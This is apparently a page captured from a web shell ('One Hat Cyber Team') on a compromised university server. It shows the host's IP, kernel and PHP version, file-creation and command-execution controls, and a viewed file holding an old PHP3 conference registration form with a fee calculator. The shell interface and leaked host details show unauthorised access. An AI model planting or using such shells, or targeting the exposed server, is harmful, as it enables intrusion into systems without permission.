One Hat Cyber Team
Your IP :
216.73.216.80
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
vo
/
public_html
/
kats
/
View File Name :
regis_01.php3
<!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=koi8-r"> <meta http-equiv="Content-Script=Type" content="text/javascript"> <meta name="Author" content="Sergiy Kolyada"> <meta name="GENERATOR" content="Mozilla/4.7 [en] (Win98; I) [Netscape]"> <title>Registration</title> <script type="text/javascript" DEFER > function totalnights(){ var i1 = document.forms[1].arriveDate.selectedIndex; var i2 = document.forms[1].departDate.selectedIndex; var nights = document.forms[1].departDate.options[i2].value - document.forms[1].arriveDate.options[i1].value; if(nights >=0){ document.forms[1].nights.value = nights;} else{ alert("Really depart before arrive?\nCheck dates, please!"); } return true; } function calculatefee(){ var startfee = 40; var partyfee = 20; var banquetfee = 20; var travelfee = 20; var needparty = 0; if (document.forms[1].party.checked) needparty = 1; var numberparty = document.forms[1].partypersons.selectedIndex +1; var needbanquet = 0; if(document.forms[1].banquet.checked) needbanquet=1; var numberbanquet = document.forms[1].banquetpersons.selectedIndex +1; var needtravel = 0; if(document.forms[1].needtransport[0].checked) needtravel=1; var accompanies = document.forms[1].accompanies.selectedIndex; document.forms[1].fee_part.value = startfee + needparty * partyfee + banquetfee * needbanquet + travelfee * needtravel; document.forms[1].total_part.value = document.forms[1].fee_part.value; document.forms[1].total_acc.value = needparty * partyfee * (numberparty -1) + banquetfee * needbanquet * (numberbanquet -1) + travelfee * needtravel * accompanies; document.forms[1].total.value = startfee + needparty * partyfee * numberparty + banquetfee * needbanquet * numberbanquet + travelfee * needtravel * (accompanies +1); } </script> </head> <body text="#000000" bgcolor="#FFFFFF" ONLOAD="totalnights(); calculatefee();"> <table BORDER WIDTH="720" bgcolor="#38354D"> <tr VALIGN=TOP> <td ALIGN=LEFT VALIGN=CENTER WIDTH="70%"><a href="kats2000.html"><img SRC="Koshkas1.jpg" ALT="logo" BORDER=0 height=100 width=145 align=CENTER></a><b><font face="Arial"><font size=+2><font color="#66FFFF"> R e g i s t r a t i o n F o r m</font></font></b></td> </tr> </table> <table BORDER WIDTH="720" > <tr VALIGN=TOP> <td WIDTH="100%" BACKGROUND="oblbeg.jpg">.</td> </tr> </table> <p><b><font size=+1><font color="#CC0000">REGISTRATION</font><font color="#000000"> FORM FOR ONE PARTICIPANT</font></font></b> <p>You can update or change the data in this form later. To keep us informed about your plans, please, enter as much information as you can at the moment, and make all changes and addittions as soon as possible. <br>To fill or update this form, personal key is needed. <a href="getkey.php3">Get your key</a> <br><form ACTION="update_form.php3" METHOD=POST> <table CELLSPACING=0 > <tr> <td><b>Please, enter your personal key: </b></td> <td><input TYPE=password NAME="pw" SIZE="10"><input TYPE=submit VALUE="submit"></td> </tr> </table> </form><form ACTION="register1.php3" METHOD="POST"> </form> </body> </html>